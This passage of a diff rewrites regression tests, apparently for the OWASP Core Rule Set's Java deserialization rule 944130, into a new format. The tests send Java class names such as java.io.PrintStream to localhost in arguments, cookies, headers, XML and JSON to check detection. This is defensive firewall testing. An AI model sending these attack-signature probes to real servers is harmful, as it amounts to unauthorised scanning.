\"java.io.PipedOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 210 desc: "Argument test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 211 desc: "Argument name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 212 desc: "Cookie test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 
log_contains: "id \"944130\"" - - test_title: 944130-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 213 desc: "Cookie name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 214 desc: "Request header test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
- Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 215 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 216 desc: "XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 217 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 218 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + 
output: + log: + expect_ids: [944130] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 221 desc: "Argument test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 222 desc: "Argument name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log: + expect_ids: [944130] + - test_id: 223 desc: "Cookie test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 224 desc: "Cookie name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 225 desc: "Request header test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 226 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 227 desc: "XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 228 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 229 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log: + expect_ids: [944130] + - 
test_id: 231 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 232 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 233 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 234 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 235 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 236 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
